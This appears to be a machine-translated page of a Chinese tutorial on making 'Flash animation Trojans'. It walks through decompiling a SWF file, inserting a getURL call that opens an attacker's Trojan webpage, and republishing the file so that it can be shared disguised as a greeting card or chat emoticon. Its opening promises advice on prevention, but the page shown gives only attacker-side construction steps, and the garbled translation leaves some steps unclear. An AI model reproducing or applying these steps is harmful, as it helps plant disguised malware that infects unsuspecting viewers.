Watch Flash animation on the website, receive a Flash card from "friends", or even a QQ magic expression, and get a trojan as soon as you have no worries! Flash Animation Trojans are everywhere, and the attack power and coverage are extremely wide. Many of my friends want to understand the principles of Flash Trojans and how attackers insert Trojans into SWF? How should we prevent Flash Trojans?
I. Preparation for making Flash Animation Trojans
The principle of Flash Animation Trojan is to enable Flash to automatically open a website when the Flash Animation Trojan is displayed on a webpage or directly Played locally. This website is a pre-created Trojan webpage. That is to say, before creating a webpage Trojan, we need to create a webpage Trojan and place it on a website.
In addition, we recommend comparing and absorbing Flash Animation files, including mm .swf, Flash decompilation tool, and Macromedia Flash MX.
Ii. Original Flash Trojan
Although many Flash Animation Trojan tools are available, it is necessary to use the original method to create a Flash trojan from the beginning to understand the basic principles of Flash Animation Trojan.
Step 1: decompile SWF animation
First, compile the Flash Animation file to be inserted into the webpage into mm .swf and decompile it into an editable. fla format. When running the movie, click the waybill file, and quickly open the command to import it to the mm .swf file. Click the "export FLA" command on the toolbar to export the animation to the "MM hot dance. fla" file.
Step 2: insert webpage Trojan code
Then run the Flash Animation editor Macromedia Flash MX, click "file"> "open" in the menu, and transfer the saved fla file. Expand the "Action/frame" column at the bottom of the interface, expand "action" → "Browser/network", and click the "getURL" command, in the "URL" in the window on the right, enter the webpage Trojan address; the window mode is "_ blank"; the variable is set to "send by GET ", in the code window below, "getURL (" http: // webpage Trojan address "," _ blank "," GET ");" appears ");".
Step 3: generate a Flash Trojan
After setting, save the file and click "file"> "publish" to export the animation to SWF. Open the generated Flash Animation trojan in IE browser. You can see that when Flash animation is played, a browser window will pop up automatically, showing our Trojan webpage.
[Content navigation] |
Page 1: How is a Flash Trojan made? |
Page 1: How is a Flash Trojan made? |